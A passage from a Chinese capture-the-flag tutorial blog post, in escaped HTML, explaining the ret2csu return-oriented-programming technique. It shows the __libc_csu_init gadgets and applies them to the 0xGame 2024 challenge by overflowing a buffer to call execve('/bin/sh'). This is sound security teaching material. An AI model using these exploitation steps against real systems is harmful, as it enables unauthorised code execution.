403E10h)[r15+rbx*8]<\/code>\uff09\u4f1a\u8c03\u7528<code>r15+rbx*8<\/code>\u6307\u5411\u7684\u51fd\u6570\uff08\u503c\u5f97\u6ce8\u610f\u7684\u662f\uff0c\u6709\u65f6\u5019<code>r12<\/code>\u4f1a\u4e0e<code>r15<\/code>\u7684\u7528\u6cd5\u5bf9\u8c03\uff09\uff1b\u6700\u540e\u4e09\u884c\u5219\u8868\u793a\u5c06<code>rbx+1<\/code>\u4e0e<code>rbp<\/code>\u8fdb\u884c\u6bd4\u8f83\uff0c\u82e5\u4e0d\u76f8\u7b49\u5219\u4f1a\u91cd\u590d\u6267\u884c\u8fd9\u4e00\u6bb5\u6c47\u7f16\u4ee3\u7801\uff0c\u5728\u4e00\u822c\u5229\u7528\u7684\u65f6\u5019\uff0c\u6211\u4eec\u4f1a\u4ee4<code>rbx<\/code>\u7b49\u4e8e0\uff0c\u800c<code>rbp<\/code>\u7b49\u4e8e1\uff0c\u8fd9\u65e2\u80fd\u76f4\u63a5\u8c03\u7528<code>r15<\/code>\u6307\u5411\u7684\u51fd\u6570\uff0c\u4e5f\u80fd\u901a\u8fc7\u8fd9\u4e2a\u6bd4\u8f83.<\/p>\n\n\n\n<p>\u800c\u503c\u5f97\u6ce8\u610f\u7684\u7b2c\u4e8c\u6bb5\uff08\u8bb0\u4e3acsu2\uff09\u4e3a\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre 
class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>add     rsp, 8\npop     rbx\npop     rbp\npop     r12\npop     r13\npop     r14\npop     r15\nretn<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">add<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rsp<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #B48EAD\">8<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rbx<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rbp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">r12<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">r13<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span 
style=\"color: #81A1C1\">r14<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">r15<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">retn<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u8fd9\u6bb5\u4ee3\u7801\u9996\u5148\u5c06<code>rsp<\/code>\u52a08\uff0c\u8fd9\u884c\u4ee3\u7801\u4e00\u822c\u53ef\u4ee5\u5ffd\u7565\uff0c\u800c\u540e\u9762\u5219\u662f\u4f9d\u6b21\u5c06\u6808\u9876\u5143\u7d20\u5f39\u51fa\u81f3<code>rbx<\/code>,<code>rbp<\/code>,<code>r12<\/code>,<code>r13<\/code>,<code>r14<\/code>,<code>r15<\/code>\u901a\u8fc7\u8fd9\u6bb5\u6c47\u7f16\u4ee5\u53ca\u4e0a\u9762\u63d0\u5230\u7684\u90a3\u4e00\u6bb5\u6c47\u7f16\uff0c\u6211\u4eec\u53ef\u4ee5\u63a7\u5236\u7684\u5bc4\u5b58\u5668\u6709\uff1a<code>rbx<\/code>,<code>rbp<\/code>,<code>rdx<\/code>,<code>rsi<\/code>,<code>rdi<\/code>\u7684\u4f4e32\u4f4d\uff08\u5373<code>edi<\/code>\uff09,<code>r12<\/code>,<code>r13<\/code>,<code>r14<\/code>\u53ca<code>r15<\/code>\uff0c\u901a\u8fc7\u8fd9\u4e24\u6bb5\u4ee3\u7801\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u63a7\u5236\u5f88\u591a\u53c2\u6570\uff0c\u7b97\u662f\u4e00\u6bb5\u4e07\u80fd\u7684gadgets.<\/p>\n\n\n\n<p>\u5728\u5229\u7528\u7684\u65f6\u5019\uff0c\u6211\u4eec\u4e00\u822c\u4f1a\u5148\u6267\u884ccsu2\uff0c\u5c06\u4e00\u4e9b\u6211\u4eec\u60f3\u8981\u7684\u53c2\u6570\u538b\u5165\u6808\u4e4b\u540e\u4f9d\u6b21\u5f39\u51fa\u5230\u5bf9\u5e94\u5bc4\u5b58\u5668\u4e2d\uff0c\u518d\u53bb\u6267\u884ccsu1\uff0c\u6211\u4eec\u6ce8\u610f\u5230\uff0ccsu1\u7684\u672b\u5c3e\u5e76\u6ca1\u6709<code>ret<\/code>\uff0c\u4e5f\u5c31\u662f\u8bf4\uff0c\u5728\u6267\u884c\u5b8c<code>csu1<\/code>\u4e4b\u540e\uff0c\u7a0b\u5e8f\u8fd8\u4f1a\u518d\u6b21\u6267\u884ccsu2\uff0c\u6240\u4ee5\u5728\u6784\u9020payload\u7684\u65f6\u5019\uff0c\u82e5\u6211\u4eec\u4e0d\u9700\u8981\u518d\u6b21\u64cd\u63a7\u5bc4\u5b58\u5668\u7684\u503c\uff0c\u5c31\u53ef\u4ee5\u5728<code>csu1<\/code>\u4e4b\u540e
\u6dfb\u52a0\u4e00\u4e32\u957f\u5ea6\u4e3a0x38\uff08\u4e5f\u5c31\u662f7\u4e588\uff09\u7684\u5783\u573e\u6570\u636e\uff08\u5982\u679c\u8981\u64cd\u63a7\u5c31\u518d\u6784\u9020\u4e00\u6b21\u5c31\u884c\uff09\u3002<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u5728csu2\u91cc\u9762\u9690\u85cf\u4e86\u4e00\u6bb5<code>pop rdi<\/code>\u4ee5\u53ca\u4e00\u6bb5<code>pop rsi<\/code>\uff0c\u56e0\u4e3a<code>pop rdi<\/code>\u7684\u673a\u5668\u7801\u4e3a<code>5F<\/code>\uff0c\u800c<code>pop r15<\/code>\u7684\u673a\u5668\u7801\u4e3a<code>41 5F<\/code>\uff0c\u8fd9\u4e2a\u65f6\u5019\u6211\u4eec\u5c31\u53ef\u4ee5\u622a\u53d6<code>pop r15<\/code>\u7684\u540e\u534a\u6bb5\u6765\u5f97\u5230<code>pop rdi<\/code>\uff1b\u53c8\u7531\u4e8e<code>pop rsi<\/code>\u7684\u673a\u5668\u7801\u4e3a<code>5E<\/code>\uff0c\u800c<code>pop r14<\/code>\u7684\u673a\u5668\u7801\u4e3a<code>41 5E<\/code>\uff0c\u6240\u4ee5\u6211\u4eec\u5c31\u53ef\u4ee5\u622a\u53d6<code>pop r14<\/code>\u7684\u540e\u534a\u6bb5\u6765\u5f97\u5230<code>pop rsi<\/code>\uff0c\u6240\u4ee5\u9700\u8981\u5229\u7528<code>pop rdi<\/code>\u4e0e<code>pop rsi<\/code>\u4e24\u6bb5\u6c47\u7f16\u7684\u65f6\u5019\u5f80\u5f80\u4f1a\u6765\u8fd9\u91cc\u627e.<\/p>\n<\/blockquote>\n\n\n\n<h4 class=\"wp-block-heading\">\u4f8b\uff1a[0xgame 2024 Week1] ret2csu<\/h4>\n\n\n\n<p>\u9898\u76ee\u9644\u4ef6\u5728\u8fd9\u91cc\u80fd\u627e\u5230\uff1a<a href=\"https:\/\/github.com\/X1cT34m\/0xGame2024\/tree\/main\/Pwn\">0xGame2024\/Pwn at main \u00b7 X1cT34m\/0xGame2024<\/a><\/p>\n\n\n\n<p>checksec\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-33.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-33.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"288\" height=\"137\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-33.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-166\"\/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u5e76\u6ca1\u6709\u5f00\u542f\u4efb\u4f55\u4fdd\u62a4\uff0c\u770b\u5230<code>main<\/code>\u51fd\u6570\u6709:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-34.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-34.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"702\" height=\"379\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-34.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-167\"  sizes=\"auto, (max-width: 702px) 100vw, 702px\" 
\/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u8fd9\u91cc\u8ba9\u6211\u4eec\u5411<code>something<\/code>\u4e2d\u8f93\u5165\u4e00\u4e9b\u4e1c\u897f\uff0c\u663e\u7136\u8fd9\u4e2a<code>something<\/code>\u5728\u5185\u5b58\u4e2d\uff0c\u800c\u540e\u9762\u8981\u8f93\u5165<code>buf<\/code>\uff0c<code>buf<\/code>\u7684\u7a7a\u95f4\u4e3a16\u5b57\u8282\uff0c\u4f46\u662f\u53ef\u4ee5\u8f93\u5165\u7684\u5b57\u8282\u6570\u4e3a0x60\uff0c\u660e\u663e\u5b58\u5728\u6808\u6ea2\u51fa\uff0c\u4f46\u662f\u540e\u9762\u5bf9<code>buf<\/code>\u7684\u957f\u5ea6\u8fdb\u884c\u6bd4\u8f83\uff0c\u8981\u6c42\u4e0d\u80fd\u8d85\u8fc70x10\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7<code>\\x00<\/code>\u622a\u65ad\u6765\u7ed5\u8fc7\uff0c\u73b0\u5728\u6211\u4eec\u770b\u6ea2\u51fa\u4e4b\u540e\u6211\u4eec\u9700\u8981\u6267\u884c\u4ec0\u4e48\u64cd\u4f5c\uff0c\u5bfb\u627e\u53d1\u73b0\u6709\u4e00\u4e2a\u51fd\u6570\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-35.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-35.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"85\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-35.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-168\"  sizes=\"auto, (max-width: 700px) 100vw, 700px\" 
\/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u91cc\u9762\u6709\u4e00\u4e2a\u9700\u8981\u4f20\u5165\u53c2\u6570\u7684<code>execve<\/code>\uff0c\u53ef\u4ee5\u770b\u5230\u5b83\u7684\u4e09\u4e2a\u53c2\u6570\u5206\u522b\u4e3a\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-36.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-36.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"787\" height=\"121\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-36.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-169\"  sizes=\"auto, (max-width: 787px) 100vw, 787px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u4e09\u4e2a\u53c2\u6570\u5206\u522b\u662f\uff1a<\/p>\n\n\n\n<ol 
class=\"wp-block-list\">\n<li><code>filename<\/code>\uff0c\u5b58\u5728<code>rdi<\/code>\u5bc4\u5b58\u5668\u5185\uff0c\u8868\u793a\u51c6\u5907\u8f7d\u5165\u5f53\u524d\u8fdb\u7a0b\u7a7a\u95f4\u7684\u65b0\u7a0b\u5e8f\u7684\u8def\u5f84\u540d\uff1b<\/li>\n\n\n\n<li><code>argv[]<\/code>\uff0c\u5b58\u5728<code>rsi<\/code>\u5bc4\u5b58\u5668\u5185\uff0c\u8868\u793a\u4f20\u7ed9\u65b0\u8fdb\u7a0b\u7684\u547d\u4ee4\u884c\u53c2\u6570\uff1b<\/li>\n\n\n\n<li><code>envp[]<\/code>\uff0c\u5b58\u5728<code>rdx<\/code>\u5bc4\u5b58\u5668\u5185\uff0c\u6307\u5b9a\u4e86\u65b0\u7a0b\u5e8f\u7684\u73af\u5883\u5217\u8868.<\/li>\n<\/ol>\n\n\n\n<p>\u6240\u4ee5\u6211\u4eec\u8981\u5229\u7528<code>execve<\/code>\u8fd9\u4e2a\u51fd\u6570\uff0c\u6211\u4eec\u5411\u4e09\u4e2a\u5bc4\u5b58\u5668\u4e2d\u5b58\u5165\u6570\u636e\u7684\u5bf9\u5e94\u5173\u7cfb\u5982\u4e0b\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>register<\/th><th>value<\/th><\/tr><\/thead><tbody><tr><td><code>rdi<\/code><\/td><td><code>\/bin\/sh<\/code>\u7684\u5730\u5740<\/td><\/tr><tr><td><code>rsi<\/code><\/td><td>0<\/td><\/tr><tr><td><code>rdx<\/code><\/td><td>0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>\u5bf9\u4e8e<code>\/bin\/sh<\/code>\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u5411<code>something<\/code>\u4e2d\u5199\u5165\u6765\u5f97\u5230\uff0c\u73b0\u5728\u89e3\u51b3\u5411\u51fd\u6570\u5185\u4f20\u5165\u53c2\u6570\u7684\u95ee\u9898\uff0c\u901a\u8fc7\u67e5\u627e\u53ef\u4ee5\u53d1\u73b0\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-37.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-37.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"364\" height=\"100\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-37.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-170\"  sizes=\"auto, (max-width: 364px) 100vw, 364px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u7f3a\u5c11<code>pop rdx<\/code>\u8fd9\u4e00\u6761\u91cd\u8981\u7684\u6307\u4ee4\uff0c\u6240\u4ee5\u6211\u4eec\u8003\u8651\u4f7f\u7528ret2csu\uff0c\u89c2\u5bdf\u8be5\u7a0b\u5e8f\u7684<code>__libc_csu_init<\/code>\u51fd\u6570\uff0c\u53ef\u4ee5\u53d1\u73b0\u6709\u5982\u4e0b\u4e24\u6bb5\u6c47\u7f16\uff1a<\/p>\n\n\n\n<p>\u7b2c\u4e00\u6bb5\u4e3a\uff08\u8bb0\u4f5c<code>csu1<\/code>\uff09\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" 
tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>loc_4013A0:\nmov     rdx, r14\nmov     rsi, r13\nmov     edi, r12d\ncall    ds:(__frame_dummy_init_array_entry - 403E10h)&#91;r15+rbx*8&#93;\nadd     rbx, 1\ncmp     rbp, rbx\njnz     short loc_4013A0<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #88C0D0\">loc_4013A0<\/span><span style=\"color: #ECEFF4\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">mov<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rdx<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #81A1C1\">r14<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">mov<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rsi<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #81A1C1\">r13<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">mov<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">edi<\/span><span 
style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #81A1C1\">r12d<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">call<\/span><span style=\"color: #D8DEE9FF\">    <\/span><span style=\"color: #81A1C1\">ds<\/span><span style=\"color: #D8DEE9FF\">:(__frame_dummy_init_array_entry - <\/span><span style=\"color: #B48EAD\">403E10h<\/span><span style=\"color: #D8DEE9FF\">)&#91;<\/span><span style=\"color: #81A1C1\">r15<\/span><span style=\"color: #D8DEE9FF\">+<\/span><span style=\"color: #81A1C1\">rbx<\/span><span style=\"color: #D8DEE9FF\">*<\/span><span style=\"color: #B48EAD\">8<\/span><span style=\"color: #D8DEE9FF\">&#93;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">add<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rbx<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #B48EAD\">1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">cmp<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rbp<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #81A1C1\">rbx<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">jnz<\/span><span style=\"color: #D8DEE9FF\">     short loc_4013A0<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u7b2c\u4e8c\u6bb5\u4e3a\uff08\u8bb0\u4f5c<code>csu2<\/code>\uff09\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" 
transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>add     rsp, 8\npop     rbx\npop     rbp\npop     r12\npop     r13\npop     r14\npop     r15\nretn<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">add<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rsp<\/span><span style=\"color: #D8DEE9FF\">, <\/span><span style=\"color: #B48EAD\">8<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #81A1C1\">rbx<\/span><\/span>\n<span class=\"line\"><span style=\"color: #81A1C1\">pop<\/span><span style=\"color: #D8DEE9FF\">     
